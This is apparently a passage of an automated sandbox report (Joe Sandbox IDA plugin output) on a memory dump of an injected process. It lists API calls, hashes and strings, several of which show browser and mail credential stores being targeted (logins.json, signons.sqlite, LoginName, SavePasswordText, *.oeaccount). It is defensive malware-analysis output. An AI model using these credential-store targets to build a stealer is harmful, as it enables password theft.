                                                  • memset.MSVCRT ref: 004109F7
                                                    • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                    • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                                                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                  • memset.MSVCRT ref: 00410A32
                                                  • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                  • String ID:
                                                  • API String ID: 3143880245-0
                                                  • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                  • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                  • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                  • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@
                                                  • String ID:
                                                  • API String ID: 1033339047-0
                                                  • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                  • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                  • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                  • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@mallocmemcpy
                                                  • String ID:
                                                  • API String ID: 3831604043-0
                                                  • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                  • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                  • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                  • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                    • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                  • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CreateFontIndirect_mbscpymemset
                                                  • String ID: Arial
                                                  • API String ID: 3853255127-493054409
                                                  • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                  • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                  • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                  • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                  • _strcmpi.MSVCRT ref: 0040CEC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: strlen$_strcmpimemset
                                                  • String ID: /stext
                                                  • API String ID: 520177685-3817206916
                                                  • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                  • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                  • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                  • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • VirtualProtect.KERNELBASE(?,00000078,00000004), ref: 0044B43E
                                                  • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000078,00000004), ref: 0044B452
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 7b0ab345f8b147095ec499268aed239778a4d345bd8648cab821ed5a180e1bce
                                                  • Instruction ID: ac13c79d7fe72252008cad2d8c7d399cb1c4cdb5f22be9a76d9ffffc69c753be
                                                  • Opcode Fuzzy Hash: 7b0ab345f8b147095ec499268aed239778a4d345bd8648cab821ed5a180e1bce
                                                  • Instruction Fuzzy Hash: 86F0A4011896907DFA2199B90C42BB75BCCCB27320B240B4BF690C7283D69DCA1693FA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                  • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Library$AddressFreeLoadProc
                                                  • String ID:
                                                  • API String ID: 145871493-0
                                                  • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                  • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                  • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                  • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                    • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                    • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                    • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfile$StringWrite_itoamemset
                                                  • String ID:
                                                  • API String ID: 4165544737-0
                                                  • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                  • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                  • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                  • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                  • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                  • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                  • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                  • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                  • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                  • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FreeLibrary
                                                  • String ID:
                                                  • API String ID: 3664257935-0
                                                  • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                  • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                  • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                  • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: EnumNamesResource
                                                  • String ID:
                                                  • API String ID: 3334572018-0
                                                  • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                  • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                  • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                  • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: CloseFind
                                                  • String ID:
                                                  • API String ID: 1863332320-0
                                                  • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                  • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                  • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                  • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                  • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                  • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                  • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                  • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                  • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                  • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                  • LoadCursorA.USER32(00000067), ref: 0040115F
                                                  • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                  • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                  • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                  • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                  • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                  • EndDialog.USER32(?,00000001), ref: 0040121A
                                                  • DeleteObject.GDI32(?), ref: 00401226
                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                  • ShowWindow.USER32(00000000), ref: 00401253
                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                  • ShowWindow.USER32(00000000), ref: 00401262
                                                  • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                  • memset.MSVCRT ref: 0040128E
                                                  • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                  • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                  • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                  • String ID:
                                                  • API String ID: 2998058495-0
                                                  • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                  • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                  • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                  • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _mbscat$memsetsprintf$_mbscpy
                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                  • API String ID: 633282248-1996832678
                                                  • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                  • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                  • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                  • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                    • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                    • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                                                    • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                                                    • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                    • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                                                    • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                                                    • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                  • strlen.MSVCRT ref: 0040F139
                                                  • strlen.MSVCRT ref: 0040F147
                                                  • memset.MSVCRT ref: 0040F187
                                                  • strlen.MSVCRT ref: 0040F196
                                                  • strlen.MSVCRT ref: 0040F1A4
                                                  • memset.MSVCRT ref: 0040F1EA
                                                  • strlen.MSVCRT ref: 0040F1F9
                                                  • strlen.MSVCRT ref: 0040F207
                                                  • _strcmpi.MSVCRT ref: 0040F2B2
                                                  • _mbscpy.MSVCRT ref: 0040F2CD
                                                  • _mbscpy.MSVCRT ref: 0040F30E
                                                    • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                                                  • String ID: logins.json$none$signons.sqlite$signons.txt
                                                  • API String ID: 1613542760-3138536805
                                                  • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                  • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                  • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                  • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                  • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Library$FreeLoad
                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                  • API String ID: 2449869053-232097475
                                                  • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                  • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                  • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                  • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • strchr.MSVCRT ref: 004100E4
                                                  • _mbscpy.MSVCRT ref: 004100F2
                                                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                    • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                    • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                  • _mbscpy.MSVCRT ref: 00410142
                                                  • _mbscat.MSVCRT ref: 0041014D
                                                  • memset.MSVCRT ref: 00410129
                                                    • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                    • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                                                  • memset.MSVCRT ref: 00410171
                                                  • memcpy.MSVCRT ref: 0041018C
                                                  • _mbscat.MSVCRT ref: 00410197
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                  • String ID: \systemroot
                                                  • API String ID: 912701516-1821301763
                                                  • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                  • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                  • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                  • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                  • strchr.MSVCRT ref: 0040327B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringstrchr
                                                  • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                  • API String ID: 1348940319-1729847305
                                                  • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                  • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                  • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                  • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                  • API String ID: 3510742995-3273207271
                                                  • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                  • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                  • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                  • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpymemset
                                                  • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                  • API String ID: 1297977491-3883738016
                                                  • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                  • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                  • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                  • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
